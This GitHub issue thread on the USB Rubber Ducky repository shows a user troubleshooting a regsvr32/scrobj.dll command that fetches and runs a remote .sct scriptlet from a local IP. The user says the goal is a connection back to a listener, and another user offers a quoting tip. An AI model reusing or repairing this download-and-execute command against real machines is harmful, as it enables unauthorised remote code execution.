### ISSUE TITLE
A little help whih index.sct

### ISSUE THREAD

**Issue by sindikto** [hak5darren/USB-Rubber-Ducky#146]
regsvr32 /s /n /u /i:http://192.168.1.70/root/var/www/html/ps1encod/index.sct scrobj.dll

**Comment by hadrins** [comment]
Have you tried running it from a prompt?  
My first guess is that "http://192.168.1.70/root/var/www/html/ps1encod/index.sct scrobj.dll" should be in quotes.

**Comment by sindikto** [comment]
thank you very much for your time, I have tried it but nothing happens

bye and thanks again

**Comment by sindikto** [comment]
Could you tell me what should happen exactly?

Bye and thanks again.

**Comment by sindikto** [comment]
> regsvr32 /s /n /u /i:http://192.168.1.70/root/var/www/html/ps1encod/index.sct scrobj.dll
Days after....
I  have found that the command exceeds the route because it works better for me:
http: //ip/index.sct the problem is that the remote machine asks to save the file so it does not open the connection with the listener.
Any suggestions for this?
